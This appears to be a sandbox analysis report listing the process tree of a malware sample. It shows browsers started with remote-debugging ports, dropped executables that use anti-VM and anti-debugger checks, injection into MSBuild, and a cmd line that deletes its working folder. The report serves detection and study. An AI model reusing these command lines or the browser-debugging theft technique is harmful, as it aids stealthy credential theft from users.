            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3260 /prefetch:1
            - Uses browser remote debugging
            PID: 3784
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3312 /prefetch:1
            - Uses browser remote debugging
            PID: 3652
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4300,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4324 /prefetch:2
            - Uses browser remote debugging
            PID: 5404
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4724,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4668 /prefetch:1
            - Uses browser remote debugging
            PID: 3840
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5348,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5356 /prefetch:8
            PID: 5420
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4460 /prefetch:8
            PID: 776
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5556,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5636 /prefetch:8
            PID: 4796
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5708,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5720 /prefetch:8
            PID: 1416
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5624,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5580 /prefetch:8
            PID: 1944
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5616,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5724 /prefetch:8
            PID: 3940
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
          - Uses browser remote debugging
          - Checks processor information in registry
          - Enumerates system info in registry
          - Modifies data under HKEY_USERS
          - Modifies registry class
          - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          - Suspicious use of FindShellTrayWindow
          PID: 6088
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 6)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x258,0x7fffb037f208,0x7fffb037f214,0x7fffb037f220
            PID: 4916
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 6)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2180,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:2
            PID: 1632
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 6)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:3
            PID: 4612
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 6)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2436,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:8
            PID: 3824
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 6)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3548,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:1
            - Uses browser remote debugging
            PID: 4176
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 6)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3580,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:1
            - Uses browser remote debugging
            PID: 6024
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 6)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4212,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:1
            - Uses browser remote debugging
            PID: 4180
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 6)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4232,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:2
- Uses browser remote debugging
PID:4900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5132,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:86⤵PID:448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3764,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:86⤵PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4816,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:86⤵PID:5532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3796,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:86⤵PID:2936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6312,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:86⤵PID:5152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6312,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:86⤵PID:3808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6660,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6640 /prefetch:86⤵PID:3516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6680,i,4672032645935619218,17071563965938339821,262144 --variations-seed-version --mojo-platform-channel-handle=6824 /prefetch:86⤵PID:4284
-
-
-
C:\Windows\SysWOW64\cmd.exe  (depth 5, PID 4552)
  "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\gdjmg" & exit
  - System Location Discovery: System Language Discovery

C:\Windows\SysWOW64\timeout.exe  (depth 6, PID 6588)
  timeout /t 11
  - System Location Discovery: System Language Discovery
  - Delays execution with timeout.exe
C:\Users\Admin\AppData\Local\Temp\10361680101\jokererer.exe  (depth 3, PID 2428)
  "C:\Users\Admin\AppData\Local\Temp\10361680101\jokererer.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  (depth 4, PID 4580)
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\AppData\Local\Temp\10361700101\b842abf8f3.exe  (depth 3, PID 5488)
  "C:\Users\Admin\AppData\Local\Temp\10361700101\b842abf8f3.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\AppData\Local\Temp\10361710101\ec9a0b61cd.exe  (depth 3, PID 4536)
  "C:\Users\Admin\AppData\Local\Temp\10361710101\ec9a0b61cd.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\AppData\Local\Temp\10361720101\74957b3341.exe  (depth 3, PID 1192)
  "C:\Users\Admin\AppData\Local\Temp\10361720101\74957b3341.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 4, PID 5020)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
  - Uses browser remote debugging
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 5984)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffb100dcf8,0x7fffb100dd04,0x7fffb100dd10

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 4620)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --subproc-heap-profiling --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1996,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1992 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 1480)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --subproc-heap-profiling --field-trial-handle=1600,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1940 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 672)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --subproc-heap-profiling --field-trial-handle=2392,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2344 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 1636)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3324 /prefetch:1
  - Uses browser remote debugging

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 2376)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3344 /prefetch:1
  - Uses browser remote debugging

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 2004)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4248,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4292 /prefetch:2
  - Uses browser remote debugging

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 5472)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4672,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4700 /prefetch:1
  - Uses browser remote debugging

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 3312)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=4864,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5264 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 1060)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5468,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5480 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 2652)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5548,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5300 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 5224)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5260,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5372 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 2136)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5704,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5420 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe  (depth 5, PID 4108)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5340,i,10844936200787185113,10083002532664937967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5288 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 4, PID 3612)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
  - Uses browser remote debugging
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 1084)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x210,0x7fffaccef208,0x7fffaccef214,0x7fffaccef220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 4608)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 3720)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2168,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=2164 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 1188)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2496,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=2756 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 2952)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3544,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:1
  - Uses browser remote debugging

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 4064)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3552,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=3376 /prefetch:1
  - Uses browser remote debugging

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 5672)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4216,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:1
  - Uses browser remote debugging

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 5540)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4236,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:2
  - Uses browser remote debugging

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 6360)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3636,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=3736 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 6676)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3732,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=5320 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 2652)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5260,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 5, PID 4216)
